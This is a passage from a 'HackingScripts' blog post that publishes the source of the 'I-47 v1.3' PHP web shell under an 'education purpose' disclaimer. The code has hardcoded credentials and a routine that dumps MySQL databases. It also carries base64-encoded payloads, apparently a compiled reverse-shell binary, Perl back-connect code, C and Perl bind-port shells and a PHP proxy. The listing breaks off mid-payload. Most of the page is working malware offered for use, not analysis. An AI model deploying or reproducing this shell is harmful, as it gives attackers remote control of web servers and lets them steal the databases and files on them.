HackingScripts

Hack Scripts for everybody

I-47 shell

19 Feb 2014

This I-47 shell is a script coded by Arjun, who also wrote the dhanush shell.

Arjun says: “I-47 Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a “All In One” php script, so that the user do not need to go anywhere else.
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it”.

I-47 v1.3 shell Source Code

   1 <?php
   2 //========================================//
   3 //========+++I-47 v1.3+++==========//
   4 //========================================//
   5 //====+++Coded By Arjun+++===//
   6 //========================================//
   7 //=====+++An Indian Hacker+++=====//
   8 //========================================//
   9 
  10 // Set Username & Password
  11 $user = "I-47";
  12 $pass = "I-47";
  13 <?php
  14 @set_magic_quotes_runtime(0);
  15 ob_start();
  16 error_reporting(0);
  17 @set_time_limit(0);
  18 @ini_set('max_execution_time', 0);
  19 @ini_set('output_buffering', 0);
  20 // Dump Database
  21 if ($_GET["action"] == "dumpDB") {
  22     $self = $_SERVER["PHP_SELF"];
  23     if (isset($_COOKIE['dbserver'])) {
  24         $date = date("Y-m-d");
  25         $dbserver = $_COOKIE["dbserver"];
  26         $dbuser = $_COOKIE["dbuser"];
  27         $dbpass = $_COOKIE["dbpass"];
  28         $dbname = $_GET['dbname'];
  29         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
  30         $file = "Dump-$dbname-$date";
  31         $file = "Dump-$dbname-$date.sql";
  32         $fp = fopen($file, "w");
  33         function write($data) {
  34             global $fp;
  35             fwrite($fp, $data);
  36         }
  37         mysql_connect($dbserver, $dbuser, $dbpass);
  38         mysql_select_db($dbname);
  39         $tables = mysql_query("SHOW TABLES");
  40         while ($i = mysql_fetch_array($tables)) {
  41             $i = $i['Tables_in_' . $dbname];
  42             $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
  43             write($create['Create Table'] . ";");
  44             $sql = mysql_query("SELECT * FROM " . $i);
  45             if (mysql_num_rows($sql)) {
  46                 while ($row = mysql_fetch_row($sql)) {
  47                     foreach ($row as $j => $k) {
  48                         $row[$j] = "'" . mysql_escape_string($k) . "'";
  49                     }
  50                     write("INSERT INTO $i VALUES(" . implode(",", $row) . ");");
  51                 }
  52             }
  53         }
  54         fclose($fp);
  55         header("Content-Disposition: attachment; filename=" . $file);
  56         header("Content-Type: application/download");
  57         header("Content-Length: " . filesize($file));
  58         flush();
  59         $fp = fopen($file, "r");
  60         while (!feof($fp)) {
  61             echo fread($fp, 65536);
  62             flush();
  63         }
  64         fclose($fp);
  65     }
  66 }
  67 $back_connect_c = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
  68 $backconnect_perl = "pVRdb9owFH1H4j/cptVIJgIETaoESjVGoUXToCLQF4pQIBfwFuzIdtahaf99dmzK2IRWqY6Uj3uOzzm+cXJ5Uc8Fry8JrWfI03IpFwiDUasVsdU3lO1y6UrshcQdqBFCpWAuY7GtaKgzvuuGH9X5sQ3lElmDW5QuwqYHP1VFzck4oRKcqYg32IKrBszumZBzmD0wri5P9Ik6bUNNCILT+1GwguZ1raGOAJpBMwBL+gUmoA1nn/okxfuYJinqiigwNxp1P/cmVXjoLwZDfaMLi2gy7nW+VGGDMuNMsuWexjt0K3KVVTwPGC9C2Mwzfw5TGi9TBMlgjIKl3xF0fBtnxSjF1dFLW8dJwheEFo14nAXzKhCKchFLdqg15t5/rLpG90+rA+/93AYhdFPgQ5Vfc04oVkBxarUaHGzhX60oi5+ploq2mKZwTggTHYvjjkmErXK1TLNw/ybOJVunudi6njZgGVI3mtwOhlVwbt4ZlnMCjaaT6hmoNx7/DdlE4RvGydL8s2Pgf7g2zTjHeI1QlyWqZZ/20OFfc/oaobctzUiZD9V1cLVl4PthGBUFQtcsDH2/Dbne7ODHbc1QE16IU4H8SCOJIbzAt4SrTcD43uDZsyXA0Ul3TKNgXpiNYv8dnvK67I36vwE=";
  69 $zone = "vVRtb9owEP6OxH+4ZhFKWkJg6roqEFS0VStaX1ChmybKB8c5wGpiZ7ZZS6vut8+Gjm5V1r18mPLBuedenrvznV9shQslw4TxsECZVSvVCpt6Wwe983cfxq2Jf1etFJJxDc6lNh+/5E77JyhHUFTq5e6c0CsYH0xgSeZCwDgVegJU5FDidCSuYSTgQmEElhZuBcdGkUFnyDRCxpTuQudCwlucEooSTkmO3e+B8IZpc9xXKy6RnyGGdbbNiQHdmVwUYoO1LEbnIi9grTGiKJB7pO50rLfjG+RAWdYYOqRrzTOh0CNW4SYGVZRkRHorIwtOhfRcEjfbLunEbmKOnR2/Wrl7oLFmY5dYYtPJjQjxVwg/iQVQwkGhLZJfKUjQhEOQWGRLH+5ALRKl5aNbHZp1eO1D7DhtuN80cbwzgYFQ2mTGU/ZIum7QQiH0z6JoKOgV6ijqnx6ObDXKyKagp6qgy/HaGyDKXppKiLvgPJ+oUwdrPRBSW+t9k+JACi1WrpoWjg9CAscbvbn2NbczOBuOIORCs+kyzIlS8BumpwF6lGKhI9gOty/lj3P1oD/HKUqU0b/FDY4Jny3IzI6lDhJZSvFGcI1cB6NlYexIUWSMEs0ED2+Cv2Q1oThS6xvBe8Qi6GXsC5ayml2RQW9miCM4Ebcsy0i422iCZ1asMPRJhm04GfYPYa/RbMNHxlNxreB0BK8aLb805JEZoD9plJshn+l5vD48J10vZbzeqFoqcsJ4K34+0GZEa/ahyEWKcWu/JpEoweO9mpn7nOl4iDxd5er/quvHqyQieEiqtLCBJLOcRMBFQAmdlze0FPwfpW2emBWnLVRl5u69l/b3/hs=";
  70 $bind_port_c = "bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
  71 $bind_port_p = "bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
  72 $phpproxy = "
  73 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